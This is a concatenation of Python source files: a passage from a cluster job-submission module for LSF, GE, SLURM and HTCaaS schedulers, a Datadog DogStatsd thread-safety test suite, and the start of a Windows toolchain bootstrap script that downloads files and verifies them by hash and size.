text = " cd %s;" % cwd
if stdout and isinstance(stdout, str):
command.extend(['-o', stdout])
        if stderr and isinstance(stderr, str):
command.extend(['-e', stderr])
elif stderr == -2: # -2 is subprocess.STDOUT
pass
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text.encode())[0].decode(errors='ignore')
#Job <nnnn> is submitted to default queue <normal>.
try:
id = output.split('>',1)[0].split('<')[1]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
if not id.isdigit():
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'bjobs '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.decode(errors='ignore').strip().upper()
if 'JOBID' in line:
continue
elif str(id) not in line:
continue
status = line.split()[2]
if status == 'RUN':
return 'R'
elif status == 'PEND':
return 'I'
elif status == 'DONE':
return 'F'
else:
return 'H'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
return 0, 0, 0, 0
cmd = "bjobs " + ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
jobstatus = {}
for line in status.stdout:
line = line.decode(errors='ignore').strip()
if 'JOBID' in line:
continue
splitline = line.split()
id = splitline[0]
if id not in self.submitted_ids:
continue
jobstatus[id] = splitline[2]
idle, run, fail = 0, 0, 0
for id in self.submitted_ids[:]:
if id in jobstatus:
status = jobstatus[id]
else:
status = 'MISSING'
if status == 'RUN':
run += 1
elif status == 'PEND':
idle += 1
else:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args,**opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "bkill %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class GECluster(Cluster):
"""Class for dealing with cluster submission on a GE cluster"""
name = 'ge'
job_id = 'JOB_ID'
idle_tag = ['qw']
running_tag = ['r']
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a GE cluster"""
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s; bash " % cwd
if stdout is None:
stdout = os.path.join(cwd, "log.%s" % prog.split('/')[-1])
if stderr is None:
stderr = os.path.join(cwd, "err.%s" % prog.split('/')[-1])
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
text += prog
if argument:
text += ' ' + ' '.join(argument)
text += '\n'
tmp_submit = os.path.join(cwd, 'tmp_submit')
open(tmp_submit,'w').write(text)
a = misc.Popen(['qsub','-o', stdout,
'-e', stderr,
tmp_submit],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()[0].decode(errors='ignore')
#Your job 874511 ("test.sh") has been submitted
pat = re.compile("Your job (\d*) \(",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'qstat | grep '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
if not status:
return 'F'
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)\s+[\d\.]+\s+[\w\d\.]+\s+[\w\d\.]+\s+(\w+)\s")
stat = ''
for line in status.stdout.read().decode(errors='ignore').split('\n'):
if not line:
continue
line = line.strip()
try:
groups = pat.search(line).groups()
except:
raise ClusterManagmentError('bad syntax for stat: \n\"%s\"' % line)
if groups[0] != id: continue
stat = groups[1]
if not stat:
return 'F'
if stat in self.idle_tag:
return 'I'
if stat in self.running_tag:
return 'R'
@multiple_try()
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
if not self.submitted_ids:
return 0, 0, 0, 0
idle, run, fail = 0, 0, 0
ongoing = []
for statusflag in ['p', 'r', 'sh']:
cmd = 'qstat -s %s' % statusflag
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
#874516 0.00000 test.sh alwall qw 03/04/2012 22:30:35 1
pat = re.compile("^(\d+)")
for line in status.stdout.read().decode(errors='ignore').split('\n'):
line = line.strip()
try:
id = pat.search(line).groups()[0]
except Exception:
pass
else:
if id not in self.submitted_ids:
continue
ongoing.append(id)
if statusflag == 'p':
idle += 1
if statusflag == 'r':
run += 1
if statusflag == 'sh':
fail += 1
for id in list(self.submitted_ids):
if id not in ongoing:
self.check_termination(id)
#self.submitted_ids = ongoing
return idle, run, self.submitted - idle - run - fail, fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
def asyncrone_launch(exe, cwd=None, stdout=None, argument = [], **opt):
"""start a computation and not wait for it to finish.
this fonction returns a lock which is locked as long as the job is
running."""
mc = MultiCore(1)
mc.submit(exe, argument, cwd, stdout, **opt)
mc.need_waiting = True
return mc.lock
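# Illustrative usage (hypothetical paths): start a job in the background and use
# the returned threading.Event as a "job finished" flag.
#   lock = asyncrone_launch('./run_shower.sh', cwd='MCatNLO', stdout='shower.log')
#   ...                                # do something else while the job runs
#   lock.wait()                        # returns once the worker finished the job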
class SLURMCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'slurm'
job_id = 'SLURM_JOBID'
idle_tag = ['Q','PD','S','CF']
running_tag = ['R', 'CG']
complete_tag = ['C']
identifier_length = 8
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a SLURM cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
command = ['sbatch', '-o', stdout,
'-J', me_dir,
'-e', stderr, prog] + argument
if self.cluster_queue and self.cluster_queue != 'None':
command.insert(1, '-p')
command.insert(2, self.cluster_queue)
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate()
output_arr = output[0].decode(errors='ignore').split(' ')
id = output_arr[3].rstrip()
if not id.isdigit():
id = re.findall('Submitted batch job ([\d\.]+)', ' '.join(output_arr))
if not id or len(id)>1:
raise ClusterManagmentError( 'fail to submit to the cluster: \n%s' \
% ('stdout: %s\nstderr %s' %(output[0],output[1])))
id = id[0]
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
        cmd = 'squeue -j '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=open(os.devnull,'w'))
for line in status.stdout:
line = line.decode(errors='ignore').strip()
if 'Invalid' in line:
return 'F'
elif line.startswith(str(id)):
status = line.split()[4]
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "squeue"
pstatus = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
idle, run, fail = 0, 0, 0
ongoing=[]
for line in pstatus.stdout:
line = line.decode(errors='ignore')
if me_dir in line:
id, _, _,_ , status,_ = line.split(None,5)
ongoing.append(id)
if status in self.idle_tag:
idle += 1
elif status in self.running_tag:
run += 1
elif status in self.complete_tag:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
else:
fail += 1
#control other finished job
for id in list(self.submitted_ids):
if id not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "scancel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class HTCaaSCluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster using GPFS """
name= 'htcaas'
job_id = 'HTCAAS_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
        input/output files should be given relative to cwd
"""
# To make workspace name(temp)
cur_usr = os.getenv('USER')
if cwd is None:
cwd = os.getcwd()
cwd_cp = cwd.rsplit("/",2)
if not stdout is None:
print("stdout: %s" % stdout)
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
logger.debug(prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
arg_cmd="echo '"+temp+"' > " + cwd_arg
command = ['htcaas-mgjob-submit','-d',cwd,'-e',os.path.basename(prog)]
if argument :
command.extend(['-a ', '='.join([str(a) for a in argument])])
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
            id = a.stdout.read().decode(errors='ignore').strip()
else:
cwd_arg = cwd+"/arguments"
temp = ' '.join([str(a) for a in argument])
temp_file_name = "sub." + os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',temp_file_name]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
            id = a.stdout.read().decode(errors='ignore').strip()
logger.debug(id)
nb_try=0
nb_limit=5
if not id.isdigit() :
print("[ID is not digit]:" + id)
while not id.isdigit() :
nb_try+=1
print("[fail_retry]:"+ nb_try)
a=misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
if nb_try > nb_limit :
                raise ClusterManagmentError('fail to submit to the HTCaaS cluster: \n %s' % id)
break
self.submitted += 1
self.submitted_ids.append(id)
return id
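    # Illustrative sketch (hypothetical values, not used by this class): filling the
    # template above with
    #
    #   dico = {'cwd': '/tmp/run', 'input_files': 'ajob1', 'stdout': 'out.log',
    #           'prog': 'ajob1', 'arguments': '1 2', 'program': 'bash'}
    #
    # produces a wrapper script sub.ajob1 that cd's into /tmp/run, makes the listed
    # input files executable and runs "/bin/bash ajob1 1 2 > out.log";
    # htcaas-mgjob-submit is then pointed at that wrapper instead of the original
    # executable.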
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
if id == 0 :
status_out ='C'
else :
cmd = 'htcaas-job-status -m '+str(id)+ " -s | grep Status "
status = misc.Popen([cmd], shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
                raise ClusterManagmentError('htcaas-job-status returns error: %s' % error)
status_out= status.stdout.read().decode(errors='ignore').strip()
status_out= status_out.split(":",1)[1]
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
ongoing = []
idle, run, fail = 0, 0, 0
start = self.submitted_ids[0]
end = self.submitted_ids[-1]
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end)#+" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
        for line in status.stdout:
            line = line.decode(errors='ignore')
            #ongoing.append(line.split()[0].strip())
            status2 = line.split()[-1]
            if status2 != 'null' or line.split()[0].strip() != '0':
                ongoing.append(line.split()[0].strip())
                logger.debug("["+line.split()[0].strip()+"]"+status2)
            if status2 == 'null' or line.split()[0].strip() == '0':
                idle += 1
            elif status2 in self.idle_tag:
                idle += 1
            elif status2 in self.running_tag:
                run += 1
            elif status2 in self.complete_tag:
                if not self.check_termination(line.split()[0]):
                    idle += 1
            else:
                fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
for i in range(len(self.submitted_ids)):
cmd = "htcaas-job-cancel -m %s" % self.submitted_ids[i]
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
class HTCaaS2Cluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster without GPFS """
name= 'htcaas2'
job_id = 'HTCAAS2_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
input/output file should be given as relative to CWD
"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
if cwd or prog :
self.submitted_dirs.append(cwd)
self.submitted_exes.append(prog)
else:
logger.debug("cwd and prog not exist->"+cwd+" / "+ os.path.basename(prog))
if argument :
self.submitted_args.append('='.join([str(a) for a in argument]))
if cwd or prog :
self.submitted += 1
id = self.submitted
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
else:
temp_file_name = "sub."+ os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',new_prog]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
            id = a.stdout.read().decode(errors='ignore').strip()
logger.debug("[mode2]-["+str(id)+"]")
if cwd and prog :
self.submitted += 1
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
return id
@multiple_try()
def metasubmit(self, me_dir=None):
if self.submitted > 1100 and self.submitted == len(self.submitted_ids):
            tmp_leng = len(self.submitted_ids) // 2
tmp_dirs1= self.submitted_dirs[0:tmp_leng]
tmp_dirs2= self.submitted_dirs[tmp_leng:]
tmp_exes1= self.submitted_exes[0:tmp_leng]
tmp_exes2= self.submitted_exes[tmp_leng:]
command1 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs1 if a and a != ' ']),
'-e', ":".join([str(a) for a in tmp_exes1 if a and a != ' '])]
command2 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs2 if a and a != ' ']),
'-e', ":".join([str(a) for a in tmp_exes2 if a and a != ' '])]
if len(self.submitted_args) > 0 :
tmp_args1= self.submitted_args[0:tmp_leng]
tmp_args2= self.submitted_args[tmp_leng:]
command1.extend(['-a', ':'.join([str(a) for a in tmp_args1])])
command2.extend(['-a', ':'.join([str(a) for a in tmp_args2])])
result1 = misc.Popen(command1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
result2 = misc.Popen(command2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = str(result1.stdout.read().strip())+ "//" + str(result2.stdout.read().strip())
elif self.submitted > 0 and self.submitted == self.submitted_ids[-1]:
command = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in self.submitted_dirs if a and a != ' ']),
'-e', ":".join([str(a) for a in self.submitted_exes if a and a != ' '])]
if len(self.submitted_args) > 0 :
command.extend(['-a', ':'.join([str(a) for a in self.submitted_args])])
if self.submitted_dirs[0] or self.submitted_exes[0] :
result = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = result.stdout.read().strip()
self.submitted_ids[0]=me_dir
else:
me_dir = self.submitted_ids[-1]
elif self.submitted > 0 and self.submitted != self.submitted_ids[-1]:
me_dir = self.submitted_ids[0]
else:
me_dir = -1
logger.debug("[" + str(me_dir) + "]")
self.submitted_dirs = []
self.submitted_exes = []
self.submitted_args = []
return me_dir
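    # Illustrative note (hypothetical values): with submitted_dirs = ['/tmp/a', '/tmp/b']
    # and submitted_exes = ['job1', 'job2'], metasubmit() above collapses the whole
    # batch into a single call of the form
    #
    #   htcaas-mgjob-submit -d /tmp/a:/tmp/b -e job1:job2
    #
    # and, above roughly 1100 queued jobs, splits the colon-joined lists in half,
    # issues two such calls and returns the two meta-job ids joined by "//".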
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#logger.debug("CONTROL ONE JOB MODE")
if self.submitted == self.submitted_ids[-1] :
id = self.metasubmit(self)
tempid = self.submitted_ids[-1]
self.submitted_ids.remove(self.submitted_ids[-1])
self.submitted_ids.append(id)
logger.debug(str(id)+" // "+str(self.submitted_ids[-1]))
if id == 0 :
status_out ='C'
else:
cmd = 'htcaas-job-status -m '+ str(id) + " -s | grep Status "
status = misc.Popen([cmd],shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
raise ClusterManagmentError('htcaas-job-status returns error: %s' % error)
status_out= status.stdout.read().decode(errors='ignore').strip()
status_out= status_out.split(":",1)[1]
logger.debug("[["+str(id)+"]]"+status_out)
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
self.submitted -= 1
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
if "//" in me_dir :
if int(me_dir.split("//")[0]) < int(me_dir.split("//")[1]) :
start = me_dir.split("//")[0]
end = me_dir.split("//")[1]
else :
start = me_dir.split("//")[1]
end = me_dir.split("//")[0]
elif "/" in me_dir : # update
start = 0
end = 0
elif me_dir.isdigit():
start = me_dir
end = me_dir
elif not me_dir.isdigit():
me_dir = self.submitted_ids[0]
logger.debug("Meta_ID is not digit(control), self.submitted_ids[0]: "+str(me_dir) )
ongoing = []
idle, run, fail, done = 0, 0, 0, 0
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end) +" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.decode(errors='ignore')
status2 = line.split()[-1]
if status2 != 'null' or line.split()[0].strip() != '0':
ongoing.append(str(line.split()[0].strip())+"-"+str(line.split()[1].strip()))
logger.debug("["+line.split()[0].strip()+"-"+line.split()[1].strip()+"]"+status2)
if status2 == 'null' or line.split()[0].strip() == '0':
idle += 1
elif status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
done += 1
self.submitted -= 1
if not self.check_termination(line.split()[1]):
idle +=1
else:
fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
id = self.submitted_ids[0]
if id:
cmd = "htcaas-job-cancel -m %s" % str(id)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
from_name = {'condor':CondorCluster, 'pbs': PBSCluster, 'sge': SGECluster,
'lsf': LSFCluster, 'ge':GECluster, 'slurm': SLURMCluster,
'htcaas':HTCaaSCluster, 'htcaas2':HTCaaS2Cluster}
onecore=MultiCore(1) # create a thread to run simple bash job without having to
#fork the main process
|
test_statsd_thread_safety.py
|
# stdlib
from collections import deque
from functools import reduce
import threading
import time
import unittest
# 3p
from mock import patch
# datadog
from datadog.dogstatsd.base import DogStatsd
from datadog.util.compat import is_p3k
class FakeSocket(object):
"""
Mocked socket for testing.
"""
def __init__(self):
self.payloads = deque()
def send(self, payload):
if is_p3k():
assert type(payload) == bytes
else:
assert type(payload) == str
self.payloads.append(payload)
def recv(self):
try:
return self.payloads
except IndexError:
return None
def __repr__(self):
return str(self.payloads)
class TestDogStatsdThreadSafety(unittest.TestCase):
"""
DogStatsd thread safety tests.
"""
def setUp(self):
"""
Mock a socket.
"""
self.socket = FakeSocket()
def assertMetrics(self, values):
"""
Helper, assertions on metrics.
"""
count = len(values)
# Split packet per metric (required when buffered) and discard empty packets
packets = map(lambda x: x.split(b"\n"), self.socket.recv())
packets = reduce(lambda prev, ele: prev + ele, packets, [])
packets = list(filter(lambda x: x, packets))
# Count
self.assertEquals(
len(packets), count,
u"Metric size assertion failed: expected={expected}, received={received}".format(
expected=count, received=len(packets)
)
)
# Values
for packet in packets:
metric_value = int(packet.split(b':', 1)[1].split(b'|', 1)[0])
self.assertIn(
metric_value, values,
u"Metric assertion failed: unexpected metric value {metric_value}".format(
metric_value=metric_value
)
)
values.remove(metric_value)
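    # Hypothetical helper, not used by the tests above: a minimal sketch of the
    # packet parsing that assertMetrics() performs, assuming dogstatsd datagrams
    # of the form b"metric:value|type", joined by newlines when buffered
    # (e.g. b"foo:1|c\nfoo:2|c" -> [1, 2]).
    @staticmethod
    def _example_extract_values(payload):
        packets = [p for p in payload.split(b"\n") if p]
        return [int(p.split(b":", 1)[1].split(b"|", 1)[0]) for p in packets]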
def test_socket_creation(self):
"""
Socket creation plays well with multiple threads.
"""
# Create a DogStatsd client but no socket
statsd = DogStatsd()
# Submit metrics from different threads to create a socket
threads = []
for value in range(10000):
t = threading.Thread(target=statsd.gauge, args=("foo", value))
threads.append(t)
t.start()
for t in threads:
t.join()
@staticmethod
def _submit_with_multiple_threads(statsd, submit_method, values):
"""
Helper, use the given statsd client and method to submit the values
within multiple threads.
"""
threads = []
for value in values:
t = threading.Thread(
target=getattr(statsd, submit_method),
args=("foo", value)
)
threads.append(t)
t.start()
for t in threads:
t.join()
def test_increment(self):
"""
Increments can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "increment", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_decrement(self):
"""
Decrements can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
expected_value = set([-value for value in values])
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "decrement", expected_value)
# All metrics were properly submitted
self.assertMetrics(values)
def test_gauge(self):
"""
Gauges can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "gauge", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_histogram(self):
"""
Histograms can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "histogram", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_timing(self):
"""
Timings can be submitted from concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(statsd, "timing", values)
# All metrics were properly submitted
self.assertMetrics(values)
def test_send_batch_metrics(self):
"""
Metrics can be buffered, submitted from concurrent threads.
"""
with DogStatsd() as batch_statsd:
# Create a DogStatsd buffer client with a mocked socket
batch_statsd.socket = self.socket
# Samples
values = set(range(10000))
# Submit metrics from different threads
self._submit_with_multiple_threads(batch_statsd, "gauge", values)
# All metrics were properly submitted
self.assertMetrics(values)
@patch('datadog.dogstatsd.context.time')
def test_timed_decorator_threaded(self, mock_time):
"""
`timed` decorator plays well with concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Set up the mocked time
mock_time.return_value = 0
# Method to time
@statsd.timed("foo")
def bar():
"""
            Wait 2 time units and return.
"""
initial_time = mock_time.return_value
while mock_time.return_value < initial_time + 2:
pass
# Run the method within multiple threads
threads = []
for value in range(10):
t = threading.Thread(target=bar)
threads.append(t)
# Bump time so that previous thread can complete
mock_time.return_value += 1
t.start()
# Sleep to let the threads start
time.sleep(0.1)
        # Bump time so that all threads complete
time.sleep(0.1)
mock_time.return_value += 1
time.sleep(0.1)
mock_time.return_value += 1
for t in threads:
t.join()
# All metrics were properly submitted
expected_values = [2 for _ in range(0, 10)]
self.assertMetrics(expected_values)
@patch('datadog.dogstatsd.context.time')
def test_timed_context_manager_threaded(self, mock_time):
"""
`timed` context manager plays well with concurrent threads.
"""
# Create a DogStatsd client with a mocked socket
statsd = DogStatsd()
statsd.socket = self.socket
# Set up the mocked time
mock_time.return_value = 0
# Method to time
def bar():
"""
            Wait 2 time units and return.
"""
initial_time = mock_time.return_value
with statsd.timed("foo"):
while mock_time.return_value < initial_time + 2:
pass
# Run the method within multiple threads
threads = []
for value in range(10):
t = threading.Thread(target=bar)
threads.append(t)
# Bump time so that previous thread can complete
mock_time.return_value += 1
t.start()
# Sleep to let the threads start
time.sleep(0.1)
        # Bump time so that all threads complete
time.sleep(0.1)
mock_time.return_value += 1
time.sleep(0.1)
mock_time.return_value += 1
for t in threads:
t.join()
# All metrics were properly submitted
expected_values = [2 for _ in range(0, 10)]
self.assertMetrics(expected_values)
|
bootstrap.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# The code is placed into public domain by:
# anatoly techtonik <[email protected]>
#
# Bootstrap dependencies for compiling Mingwpy
# toolchain on Windows
#
# Securely fetch files using known hash/size
# combination, unpack them locally into .locally/
# subdir.
# --- bootstrap .locally --
#
# creates .locally/ subdirectory in the script's dir
# and sets a few global variables for convenience:
#
# ROOT - absolute path to source code checkout dir
# LOOT - absolute path to the .locally/ subdir
#
# provides some helpers:
#
# unzip(zippath, target, subdir=None)
# - extracts subdir from the zip file
# getsecure(targetdir, filespec, quiet=False)
# - download file and check hash/size
# ------------------------------ Data ---
"""
Every entry in specification for downloaded files below
contains following *required* fields:
filename - file is saved under this name in LOOT dir
(because file detection is not secure)
hashsize - to ensure that file is right
url - address the file is downloaded from
check - LOOT path to check that file is unpacked
These fields are *optional*:
name - convenient name for dependency data
unpackto - LOOT path to unpack to
(in case archive doesn't have top dir)
Let's say this is filespec version 1.0
"""
filespec = [
# tools needed for bootstrap
dict(
filename='7za920.zip',
hashsize='9ce9ce89ebc070fea5d679936f21f9dde25faae0 384846',
url='http://downloads.sourceforge.net/sevenzip/7za920.zip',
check='7zip'
),
# tools needed to build gcc and friends
dict(
filename='msys2-base-i686-20160205.tar.xz',
hashsize='2aa85b8995c8ab6fb080e15c8ed8b1195d7fc0f1 45676948',
url='https://prdownloads.sourceforge.net/msys2/msys2-base-i686-20160205.tar.xz',
check='msys32',
),
]
# ------------------------------ Code ---
# --- create .locally/ subdir ---
import os
import sys
PY3K = sys.version_info >= (3, 0)
ROOT = os.path.abspath(os.path.dirname(__file__))
LOOT = os.path.join(ROOT, '.locally/')
if not os.path.exists(LOOT):
os.mkdir(LOOT)
# ---[ utilities ]---
# from locally ...
import os
from hashlib import sha1
from os.path import exists, getsize, join
if PY3K:
import urllib.request as urllib
else:
import urllib
def hashsize(path):
'''
Generate SHA-1 hash + file size string for the given
filename path. Used to check integrity of downloads.
Resulting string is space separated 'hash size':
>>> hashsize('locally.py')
'fbb498a1d3a3a47c8c1ad5425deb46b635fac2eb 2006'
'''
size = getsize(path)
h = sha1()
with open(path, 'rb') as source:
while True:
# read in 64k blocks, because some files are too big
# and free memory is not enough
c = source.read(64*1024)
if not c:
break
h.update(c)
